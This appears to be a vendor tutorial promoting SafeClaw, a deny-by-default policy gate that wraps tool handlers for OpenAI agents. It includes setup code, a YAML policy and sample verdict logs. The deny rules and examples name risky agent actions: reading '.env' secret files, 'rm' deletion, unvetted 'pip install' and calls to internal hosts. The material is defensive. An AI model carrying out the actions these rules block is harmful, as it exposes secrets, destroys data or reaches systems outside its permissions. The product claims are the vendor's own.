2026-02-05 · Authensor

How to Safely Use OpenAI Agents

To safely use OpenAI Agents, add SafeClaw action-level gating. Install with npx @authensor/safeclaw and define a deny-by-default policy that controls which tools the agent can invoke, which files it can access through Code Interpreter, and which function calls it can make through the Assistants API or Agents SDK. OpenAI's agent ecosystem — spanning the Assistants API, the Agents SDK, and Code Interpreter — can execute arbitrary Python code, read uploaded files, call external functions you define, and chain these operations across conversation turns.

What OpenAI Agents Can Do (And Why That's Risky)

OpenAI provides multiple agent surfaces. Each has distinct capabilities:

The risk is in the function handlers and tool definitions you provide. OpenAI's infrastructure sandboxes Code Interpreter, but everything in Function Calling and the Agents SDK runs in YOUR environment with YOUR permissions.

Step-by-Step Setup

Step 1: Install SafeClaw

npx @authensor/safeclaw

Select SDK Wrapper as the integration type. For OpenAI agents, SafeClaw wraps your tool/function handlers with policy evaluation.

Step 2: Get Your API Key

Visit safeclaw.onrender.com to create a free-tier key. Free keys renew every 7 days with no credit card. The dashboard wizard helps generate your initial policy.

Step 3: Wrap Your Tool Handlers (Agents SDK)

import { SafeClaw } from "@authensor/safeclaw";
import { Agent, tool } from "@openai/agents";

const safeclaw = new SafeClaw({
apiKey: process.env.SAFECLAW_API_KEY,
policy: "./safeclaw.policy.yaml",
});

const writeFile = tool({
name: "write_file",
description: "Write content to a file",
parameters: { path: { type: "string" }, content: { type: "string" } },
execute: safeclaw.guard("file_write", async (params) => {
// Only runs if policy allows this specific path
await fs.writeFile(params.path, params.content);
return { success: true };
}),
});

const runCommand = tool({
name: "run_command",
description: "Execute a shell command",
parameters: { command: { type: "string" } },
execute: safeclaw.guard("shell_exec", async (params) => {
return await exec(params.command);
}),
});

const agent = new Agent({
name: "coding-assistant",
tools: [writeFile, runCommand],
});

Step 4: Wrap Function Handlers (Assistants API)

const safeclaw = new SafeClaw({
  apiKey: process.env.SAFECLAW_API_KEY,
  policy: "./safeclaw.policy.yaml",
});

// Before executing any function call from the Assistants API:
async function handleFunctionCall(call) {
const verdict = await safeclaw.evaluate({
action: mapFunctionToAction(call.function.name),
params: JSON.parse(call.function.arguments),
});

if (verdict.effect === "deny") {
return { error: Action denied: ${verdict.reason} };
}

return await executeFunctionCall(call);
}

Step 5: Define Your Policy

version: 1
default: deny

rules:
- action: file_read
path: "${PROJECT_DIR}/data/**"
effect: allow

- action: file_read
path: "*/.env"
effect: deny

- action: file_write
path: "${PROJECT_DIR}/output/**"
effect: allow

- action: file_write
path: "${PROJECT_DIR}/src/**"
effect: deny

- action: shell_exec
command: "python*"
effect: allow

- action: shell_exec
command: "pip install*"
effect: deny

- action: shell_exec
command: "rm*"
effect: deny

- action: network
host: "api.openai.com"
effect: allow

- action: network
host: "*.internal.company.com"
effect: deny

- action: network
host: "*"
effect: deny

Step 6: Simulate Before Enforcing

npx @authensor/safeclaw simulate --policy safeclaw.policy.yaml

Review logged verdicts, refine rules, then enforce.

What Gets Blocked, What Gets Through

ALLOWED — Agent writes analysis output:

{ "action": "file_write", "path": "/project/output/report.csv", "verdict": "ALLOW" }

DENIED — Agent tries to modify source code:

{ "action": "file_write", "path": "/project/src/auth/login.ts", "verdict": "DENY", "reason": "path matches src/** deny rule" }

ALLOWED — Agent runs a Python script:

{ "action": "shell_exec", "command": "python analyze.py --input data.csv", "verdict": "ALLOW" }

DENIED — Agent installs an unknown package:

{ "action": "shell_exec", "command": "pip install obscure-package", "verdict": "DENY", "reason": "pip install* matches deny rule" }

DENIED — Agent calls internal API:

{ "action": "network", "host": "db.internal.company.com", "verdict": "DENY", "reason": "host matches *.internal.company.com deny rule" }

Without SafeClaw vs With SafeClaw

| Scenario | Without SafeClaw | With SafeClaw |
|---|---|---|
| Function call writes to /etc/ via misinterpreted path | File written to system directory | Blocked — path outside allowed output/** |
| Agent's tool handler calls internal microservice | Request sent with ambient credentials | Blocked — internal hosts denied by network rule |
| Agent generates report to output/ directory | Report written normally | Allowedoutput/** is in write allowlist |
| Agent tries pip install in tool handler | Package installed, install scripts execute | Blockedpip install* matches deny rule |
| Agent reads uploaded data file | Data read for analysis | Alloweddata/** is in read allowlist |

Every action evaluation is recorded in SafeClaw's tamper-proof audit trail (SHA-256 hash chain). The control plane receives only action metadata — never your OpenAI API key, function arguments, or file contents. SafeClaw runs with zero third-party dependencies, evaluates in sub-millisecond time, and is backed by 446 tests under TypeScript strict mode. The client is 100% open source, MIT licensed.

Cross-References

Try SafeClaw

Action-level gating for AI agents. Set it up in your browser in 60 seconds.

$ npx @authensor/safeclaw